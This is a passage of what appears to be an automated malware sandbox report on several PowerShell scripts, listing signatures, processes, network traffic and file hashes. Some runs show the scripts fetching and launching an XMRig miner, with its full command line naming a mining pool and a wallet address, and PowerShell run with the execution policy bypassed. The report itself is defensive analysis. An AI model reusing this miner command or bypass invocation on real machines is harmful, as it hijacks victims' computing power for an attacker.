N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/636-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ifjlmu.tjm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/636-9-0x00000281BC4A0000-0x00000281BC4C2000-memory.dmp

memory/636-10-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/636-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/636-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/636-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/636-14-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:03

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4512-4-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/4512-6-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/4512-5-0x00000264B24E0000-0x00000264B2502000-memory.dmp

memory/4512-7-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/4512-10-0x00000264B2690000-0x00000264B2706000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggzvjwjv.j3g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4512-26-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/4512-49-0x00000264B2810000-0x00000264B2822000-memory.dmp

memory/4512-62-0x00000264B2670000-0x00000264B267A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3176-93-0x00000273630E0000-0x0000027363100000-memory.dmp

memory/3176-94-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/4512-95-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/3176-96-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/4512-97-0x00007FF8015F0000-0x00007FF8017CB000-memory.dmp

memory/3176-98-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-99-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-100-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-101-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-102-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-103-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-104-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-105-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-106-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-107-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-108-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-109-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-110-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-111-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-112-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-113-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-114-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-115-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-116-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-117-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-118-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-119-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-120-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-121-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-122-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-123-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-124-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-125-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-126-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-127-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-128-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-129-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-130-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-131-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-132-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-133-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-134-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-135-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-136-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-137-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-138-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-139-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-140-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-141-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-142-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-143-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-144-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-145-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-146-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-147-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-148-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-149-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-150-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-151-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-152-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-153-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-154-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-155-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-156-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-157-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

memory/3176-158-0x00007FF6D6A20000-0x00007FF6D7653000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:15

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3828 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.204.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

memory/3264-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp

memory/3264-1-0x0000025EEF860000-0x0000025EEF882000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5pgz2fyk.0yc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3264-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

memory/3264-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

memory/3264-13-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

memory/3264-15-0x0000025EEFA10000-0x0000025EEFA22000-memory.dmp

memory/3264-16-0x0000025EEF9F0000-0x0000025EEF9FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4852-47-0x0000022132850000-0x0000022132870000-memory.dmp

memory/4852-48-0x0000022134250000-0x0000022134270000-memory.dmp

memory/3264-49-0x00007FFE94223000-0x00007FFE94225000-memory.dmp

memory/3264-50-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp

memory/4852-51-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-52-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-54-0x0000022134290000-0x00000221342B0000-memory.dmp

memory/4852-53-0x0000022134270000-0x0000022134290000-memory.dmp

memory/4852-55-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-56-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-57-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-58-0x0000022134270000-0x0000022134290000-memory.dmp

memory/4852-59-0x0000022134290000-0x00000221342B0000-memory.dmp

memory/4852-60-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-61-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-62-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-63-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-64-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-65-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-66-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-67-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-68-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-69-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-70-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-71-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-72-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-73-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-74-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-75-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-76-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-77-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-78-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-79-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-80-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-81-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-82-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-83-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-84-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-85-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-86-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-87-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-88-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-89-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-90-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-91-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-92-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-93-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-94-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-95-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-96-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-97-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-98-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-99-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-100-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-101-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-102-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-103-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-104-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-105-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-106-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-107-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-108-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-109-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-110-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-111-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-112-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-113-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-114-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-115-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-116-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

memory/4852-117-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:58

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

memory/1932-0-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy0xdoh1.oqr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1932-6-0x0000021A9F580000-0x0000021A9F5A2000-memory.dmp

memory/1932-11-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-12-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-13-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-14-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-15-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-16-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp

memory/1932-17-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

memory/1932-18-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:10

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

